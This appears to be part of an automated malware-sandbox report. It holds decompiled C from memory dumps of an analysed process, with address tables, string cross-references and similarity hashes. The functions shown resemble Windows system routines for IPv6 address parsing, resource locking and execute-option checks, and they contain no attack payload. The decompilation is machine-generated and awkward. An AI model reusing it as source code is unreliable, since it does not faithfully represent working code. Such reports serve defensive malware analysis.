                                                                                                                                                              0x0219e33b
                                                                                                                                                              0x0219e33d
                                                                                                                                                              0x0219e33f
                                                                                                                                                              0x0219e341
                                                                                                                                                              0x0219e341
                                                                                                                                                              0x0219e34e
                                                                                                                                                              0x0219e353
                                                                                                                                                              0x0219e358
                                                                                                                                                              0x0219e35d
                                                                                                                                                              0x0219e35f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0219e365
                                                                                                                                                              0x0219e365
                                                                                                                                                              0x0219e368
                                                                                                                                                              0x0219e36e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0219e374
                                                                                                                                                              0x0219e32f
                                                                                                                                                              0x02193f75
                                                                                                                                                              0x02193f7a
                                                                                                                                                              0x02193f7c
                                                                                                                                                              0x02193f7e
                                                                                                                                                              0x02193f86
                                                                                                                                                              0x02177f39
                                                                                                                                                              0x02177f47
                                                                                                                                                              0x02177f47
                                                                                                                                                              0x02177f37
                                                                                                                                                              0x02177f37
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02193F12
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0219E2FB
                                                                                                                                                              • Execute=1, xrefs: 02193F5E
                                                                                                                                                              • ExecuteOptions, xrefs: 02193F04
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02193EC4
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02193F75
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0219E345
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02193F4A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 3901378454-484625025
                                                                                                                                                              • Opcode ID: 35a6974c2e4bdc321a509cb6510fb77409a27a00e5d863fe975081ca9c65a005
                                                                                                                                                              • Instruction ID: 10af4a798082bf61d970038806209261d749d53da53766d9136ab4ee4041e972
                                                                                                                                                              • Opcode Fuzzy Hash: 35a6974c2e4bdc321a509cb6510fb77409a27a00e5d863fe975081ca9c65a005
                                                                                                                                                              • Instruction Fuzzy Hash: 6E41D8316C021DBEEF20DA94DCC5FEAB3BDAF54704F0005A9F519E6180EB709A868F61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02180B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E02180B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02158980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0214DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02180CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02180CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E021806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E021806BA(_t135, _t178) == 0 || E02180A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02180CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02180CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E021806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E021806BA(_t124, _t142) == 0 || E02180A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                              0x02180b21
                                                                                                                                                              0x02180b24
                                                                                                                                                              0x02180b27
                                                                                                                                                              0x02180b2a
                                                                                                                                                              0x02180b2d
                                                                                                                                                              0x02180b30
                                                                                                                                                              0x02180b33
                                                                                                                                                              0x02180b36
                                                                                                                                                              0x02180b39
                                                                                                                                                              0x02180b3e
                                                                                                                                                              0x02180c65
                                                                                                                                                              0x02180c68
                                                                                                                                                              0x02180c6a
                                                                                                                                                              0x02180c6f
                                                                                                                                                              0x021aeb42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb48
                                                                                                                                                              0x021aeb48
                                                                                                                                                              0x02180c75
                                                                                                                                                              0x02180c7a
                                                                                                                                                              0x021aeb54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb5a
                                                                                                                                                              0x02180c80
                                                                                                                                                              0x02180c84
                                                                                                                                                              0x021aeb98
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeba6
                                                                                                                                                              0x02180cb8
                                                                                                                                                              0x02180cba
                                                                                                                                                              0x02180cd3
                                                                                                                                                              0x02180cda
                                                                                                                                                              0x02180ce4
                                                                                                                                                              0x02180ce9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180cec
                                                                                                                                                              0x02180c8c
                                                                                                                                                              0x021aeb63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb70
                                                                                                                                                              0x021aeb75
                                                                                                                                                              0x021aeb7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb8c
                                                                                                                                                              0x02180c96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180ca2
                                                                                                                                                              0x02180cac
                                                                                                                                                              0x02180cb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b44
                                                                                                                                                              0x02180b47
                                                                                                                                                              0x02180b49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b4f
                                                                                                                                                              0x02180b50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b56
                                                                                                                                                              0x02180b62
                                                                                                                                                              0x02180b7c
                                                                                                                                                              0x02180bac
                                                                                                                                                              0x02180a0f
                                                                                                                                                              0x021aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeac4
                                                                                                                                                              0x021aeac4
                                                                                                                                                              0x02180bd0
                                                                                                                                                              0x02180bd0
                                                                                                                                                              0x02180bd4
                                                                                                                                                              0x02180bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180bdb
                                                                                                                                                              0x02180be0
                                                                                                                                                              0x021aeb0e
                                                                                                                                                              0x02180a1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180a1a
                                                                                                                                                              0x021aeb1a
                                                                                                                                                              0x021aeb1f
                                                                                                                                                              0x021aeb27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb36
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb36
                                                                                                                                                              0x02180bea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180bf6
                                                                                                                                                              0x02180c00
                                                                                                                                                              0x02180c03
                                                                                                                                                              0x02180c0b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180c0b
                                                                                                                                                              0x021aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180a15
                                                                                                                                                              0x02180bb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180bc6
                                                                                                                                                              0x02180bc6
                                                                                                                                                              0x02180bcb
                                                                                                                                                              0x02180c15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180c1d
                                                                                                                                                              0x02180c20
                                                                                                                                                              0x02180c21
                                                                                                                                                              0x02180c24
                                                                                                                                                              0x02180c24
                                                                                                                                                              0x02180c26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180c26
                                                                                                                                                              0x02180bcd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180bcd
                                                                                                                                                              0x02180b89
                                                                                                                                                              0x02180b89
                                                                                                                                                              0x02180b90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b96
                                                                                                                                                              0x02180a04
                                                                                                                                                              0x02180a04
                                                                                                                                                              0x02180b9a
                                                                                                                                                              0x02180b9a
                                                                                                                                                              0x02180b9b
                                                                                                                                                              0x02180b9f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180ba5
                                                                                                                                                              0x02180ac7
                                                                                                                                                              0x02180aca
                                                                                                                                                              0x021aeacf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeade
                                                                                                                                                              0x021aeade
                                                                                                                                                              0x021aeae3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeaf3
                                                                                                                                                              0x021aeaf6
                                                                                                                                                              0x021aeaf7
                                                                                                                                                              0x021aeafe
                                                                                                                                                              0x021aeb01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeb01
                                                                                                                                                              0x021aeacf
                                                                                                                                                              0x02180ad0
                                                                                                                                                              0x02180ad4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180ada
                                                                                                                                                              0x02180ae6
                                                                                                                                                              0x02180c34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180c47
                                                                                                                                                              0x02180c49
                                                                                                                                                              0x02180c4a
                                                                                                                                                              0x02180c4e
                                                                                                                                                              0x02180c51
                                                                                                                                                              0x02180c54
                                                                                                                                                              0x02180c57
                                                                                                                                                              0x02180c5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180c60
                                                                                                                                                              0x02180afb
                                                                                                                                                              0x02180afe
                                                                                                                                                              0x02180b02
                                                                                                                                                              0x02180b05
                                                                                                                                                              0x02180b08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02180b08
                                                                                                                                                              0x02180ae6
                                                                                                                                                              0x02180b44
                                                                                                                                                              0x021809f8
                                                                                                                                                              0x021809f8
                                                                                                                                                              0x021809f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeaa0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction ID: 32c079f75419a7f6d5c2dd5d9567fc87689aac5d300c821310a3028323f707b0
                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction Fuzzy Hash: 6EA19D7598020EDEDF24EF64C8946BEB7B5AF09308F2484AAD962A7240D730964DCF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02180554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E02180554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022201c0;
									_push(_t144);
									_push(0);
									_t51 = E0213F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02184FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02193F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02193F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E021C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02193F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02183915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022201c0;
												_push(_t138);
												_push(0);
												_t58 = E0213F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02184FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02193F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02193F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E021C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02193F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02183915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02165384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0213F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02183915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0213F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02183915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0213F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02183915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02165329(_t110, _t138);
																_t69 = E021653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                              0x0218055a
                                                                                                                                                              0x0218055d
                                                                                                                                                              0x02180563
                                                                                                                                                              0x02180566
                                                                                                                                                              0x021805d8
                                                                                                                                                              0x021805e2
                                                                                                                                                              0x021805e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021805e7
                                                                                                                                                              0x021805e7
                                                                                                                                                              0x021805ea
                                                                                                                                                              0x021805f3
                                                                                                                                                              0x021805f3
                                                                                                                                                              0x02180568
                                                                                                                                                              0x02180568
                                                                                                                                                              0x02180568
                                                                                                                                                              0x02180569
                                                                                                                                                              0x02180569
                                                                                                                                                              0x02180569
                                                                                                                                                              0x0218056b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a217f
                                                                                                                                                              0x021a2183
                                                                                                                                                              0x021a225b
                                                                                                                                                              0x021a225f
                                                                                                                                                              0x021a2189
                                                                                                                                                              0x021a218c
                                                                                                                                                              0x021a218f
                                                                                                                                                              0x021a2194
                                                                                                                                                              0x021a2199
                                                                                                                                                              0x021a219d
                                                                                                                                                              0x021a21a0
                                                                                                                                                              0x021a21a2
                                                                                                                                                              0x021a21ce
                                                                                                                                                              0x021a21ce
                                                                                                                                                              0x021a21ce
                                                                                                                                                              0x021a21d0
                                                                                                                                                              0x021a21d6
                                                                                                                                                              0x021a21de
                                                                                                                                                              0x021a21e2
                                                                                                                                                              0x021a21e8
                                                                                                                                                              0x021a21e9
                                                                                                                                                              0x021a21ec
                                                                                                                                                              0x021a21f1
                                                                                                                                                              0x021a21f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a21f8
                                                                                                                                                              0x021a21fb
                                                                                                                                                              0x021a2206
                                                                                                                                                              0x021a220b
                                                                                                                                                              0x021a220c
                                                                                                                                                              0x021a2217
                                                                                                                                                              0x021a2226
                                                                                                                                                              0x021a222b
                                                                                                                                                              0x021a222c
                                                                                                                                                              0x021a222f
                                                                                                                                                              0x021a2232
                                                                                                                                                              0x021a2235
                                                                                                                                                              0x021a2235
                                                                                                                                                              0x021a223a
                                                                                                                                                              0x021a223f
                                                                                                                                                              0x021a2241
                                                                                                                                                              0x021a2243
                                                                                                                                                              0x021a2248
                                                                                                                                                              0x021a2248
                                                                                                                                                              0x021a224d
                                                                                                                                                              0x021a224f
                                                                                                                                                              0x021a2262
                                                                                                                                                              0x021a2263
                                                                                                                                                              0x021a2268
                                                                                                                                                              0x021a2269
                                                                                                                                                              0x021a2269
                                                                                                                                                              0x021a2269
                                                                                                                                                              0x021a226d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a2276
                                                                                                                                                              0x021a2279
                                                                                                                                                              0x021a227e
                                                                                                                                                              0x021a2283
                                                                                                                                                              0x021a2287
                                                                                                                                                              0x021a228a
                                                                                                                                                              0x021a228d
                                                                                                                                                              0x021a228f
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22bc
                                                                                                                                                              0x021a22be
                                                                                                                                                              0x021a22c4
                                                                                                                                                              0x021a22cc
                                                                                                                                                              0x021a22d0
                                                                                                                                                              0x021a22d6
                                                                                                                                                              0x021a22d7
                                                                                                                                                              0x021a22da
                                                                                                                                                              0x021a22df
                                                                                                                                                              0x021a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021a22e6
                                                                                                                                                              0x021a22e9
                                                                                                                                                              0x021a22f4
                                                                                                                                                              0x021a22f9
                                                                                                                                                              0x021a22fa
                                                                                                                                                              0x021a2305
                                                                                                                                                              0x021a2314
                                                                                                                                                              0x021a2319
                                                                                                                                                              0x021a231a
                                                                                                                                                              0x021a231d
                                                                                                                                                              0x021a2320
                                                                                                                                                              0x021a2323
                                                                                                                                                              0x021a2323
                                                                                                                                                              0x021a2328
                                                                                                                                                              0x021a232d
                                                                                                                                                              0x021a232f
                                                                                                                                                              0x021a2331
